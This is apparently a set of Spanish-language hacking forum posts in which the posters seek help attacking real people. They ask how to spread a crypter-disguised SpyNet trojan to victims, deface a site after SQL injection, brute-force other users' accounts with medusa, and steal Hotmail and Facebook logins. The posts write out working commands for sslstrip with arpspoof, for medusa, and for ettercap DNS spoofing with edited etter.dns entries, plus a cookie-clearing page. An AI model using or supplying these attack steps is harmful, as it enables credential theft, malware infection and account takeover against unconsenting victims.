Hola tengo este problema!: llevo usando el troyano spynet hace unos tres dias! (lo tengo configurado con NO-IP) hago una prueba Autoinfectandome (Win vista) y la prueba es efectiva, el troyano realiza muy bien su funcion, tambien he realizado la prueba con otra computadora de escritorio con windows XP y tambien funciona de maravilla, el problema comienza cuando quiero infectar otras computadoras, les envio el ejecutable (camuflado con un crypter para que no lo elimine al AV) y la persona me dice que ejecuta el Server pero spynet no lo infecta!!!, no se que puede estar saliendo mal!! ... (Definitivamente los antivirus no detectan el server asi que ese no es el problema) he estado pensando que puede ser problema del firewall de la victima, o que la victima tambien necesita abrir un puerto para que el server del troyano realice su cometido!... alguien que haya tenido este mismo problema y lo haya solucionado ¿podria ayudarme?   ...  Muchas gracias!!!

Hola muy buenas!
Voy a realizar una expo en mi universidad acerca de seguridad informatica y quiero hablar sobre troyanos, asi que quiero hacer una demo con el SET de backtrack 5, lo que quiero hacer es obtener una shell remota de un windows 7 y controlarlo con los comandos del METERPRETER, la cuestion aqui es que no tengo idea si tendre buena recepcion de wifi, asi que queria preguntar si se podria hacer la demo sin internet puesto que en el auditorio de las expo no hay internet (no se talvez con la IP de localhost 127.0.0.1 o poniendo un smartphone con la opcion de anclaje) o alguna otra idea que ustedes puedan darme... muchas gracias!!!!!

¿Como se usa esta opcion integrada en el metasploit? para que sirve?  me gustaria que me orientaran porfavor, muchas gracias!!!... 

realize una inyeccion SQL a una pagina web, y logre obtener el nombre de administrador y contraseña de la pagina web... ahora bien, como puedo hacer un deface??... ingresar y cambiar el contenido de la pagina ( no hay ninguna sección para ingresar un login o un password)   :S  alguien de ustedes sabe como hacerlo?? ... Gracias!...

Estoy intentando hackear un usuario de una web mediante un ataque de diccionario con la aplicacion medusa de backtrack 5... hice un escaneo de puertos a la pagina con nmap y pude observar abierto el http, ssh, https, doom y nrpe ... despues procedi a efectuar el ataque:

  #medusa -h ipdelapagina -u usuariodelacuenta -P diccionario.txt -M ssh -L -f

total que probe con todos los servicios... y lo unico que recibia como contraseña era la primera palabra del archivo "diccionario.txt" (obbiamente esa no es la contraseña del usuario)

¿que estoy haciendo mal? ... puede ser que la ip no es la correcta?? por que para sacar la ip del sitio yo hago un ping a la pagina, pero despues la pagina tiene un menu en el que viene la opcion "entrar"  ( y aparece el espacio para que pongas usuario y contraseña), al dar clic en "entrar" la direccion de la pagina cambia a:

nombredelapagina.com.mx/user/login  ( no se si al hacer esto la direccion ip cambia, puesto que intente hacer un ping a la direccion con "/user/login"  y no me daba ningun resultado" ...

¿ como puedo hacer este ataque de diccionario a la contraseña de un usuario de una pagina? ....  ¿conocen algun otro modo de hackear al usuario?...

Hola a todos, pues estoy intentando realizar un ataque de diccionario a una Pagina con medusa (utilizando el servicio http) ... El problema es que a la hora de hacer el ataque (quiero obtener la contraseña de un usuario de bitefight) los diccionario que descargue, solo me muestran como resultado la primera palabra que esta escrita en ellos ( obiamente no es la contraseña correcta) ahora bien quisiera saber como usar los exelentes diccionarios de john the ripper con medusa y usar de manera optativa el ataque por fuerza bruta. Todo esto lo hago en backtrack 5 muchas gracias

Hola a todos, pues estoy intentando realizar un ataque de diccionario a una Pagina con medusa (utilizando el servicio http) ... El problema es que a la hora de hacer el ataque (quiero obtener la contraseña de un usuario de bitefight) los diccionario que descargue, solo me muestran como resultado la primera palabra que esta escrita en ellos ( obiamente no es la contraseña correcta) ahora bien quisiera saber como usar los exelentes diccionarios de john the ripper con medusa y usar de manera optativa el ataque por fuerza bruta. Todo esto lo hago en backtrack muchas gracias

Hola a todos, uso backtrack 5 y sslstrip para monitorizar las conexiones SSL de la siguiente manera:

Código:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
python sslstrip.py -l 8080

Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?

he leido que se hace redireccionando a la victima a una pagina con un script...

asi que encontre un codigo para borrar las cookies (asi se le cerrara la sesion a la victima)... el codigo es el siguiente:




<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>


pero no tengo ni idea con que extension guardarlo dentro de mi servidor apache... tampoco tengo idea si es un codigo en php, html o java  :S   ...    y despues de redireccionar a la pagina con el codigo que borra las cookies, ¿como puedo volver a redireccionar a la victima a la pagina de hotmail?  ... muchas gracias espero su orientacion...

uso backtrack 5, y mi pregunta es esa, ¿como hago para reedireccionar a un usuario a una pagina falsa o clonada y que despues se vuelva a reedirigir a la pagina original?

he intentado con el ettercap, modifico la tabla DNS y clono por ejemplo la pagina de facebook con SET, y modifico

# *.facebook.com  A   MI_DIRECCION_IP

¿como puedo hacer que despues que el usuario ingrese sus datos en la pagina clonada, aparezca despues el dominio original de facebook por ejamplo? 

muchas gracias...

veran, estaba buscando resolver mi duda y parace que alguien de este foro ya encontro la solucion, el problema es que no se en que tengo fallas, el tema se encuentra en esta direccion :   

http://foro.elhacker.net/hacking_avanzado/sslstrip_arpspoof_cerrar_conexion-t344668.0.html#ixzz1iN54fsOJ



Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ...

COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www "  (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado:

<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>

Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache)  cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina...
paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando :
#locate etter.dns
#nano /usr/share/ettercap/etter.dns
ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)...
y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :

# microsoft sucks
# redirect it to www.linux.org
#

hotmail.com      A   MI_DIRECCION_IP
*.hotmail.com    A   MI_DIRECCION_IP
www.hotmail.com  PTR MI_DIRECCION_IP      # Wildcards in PTR are not allowed

guardo los cambios y procedo a ejecutar :  "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "

EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme?   muchas gracias...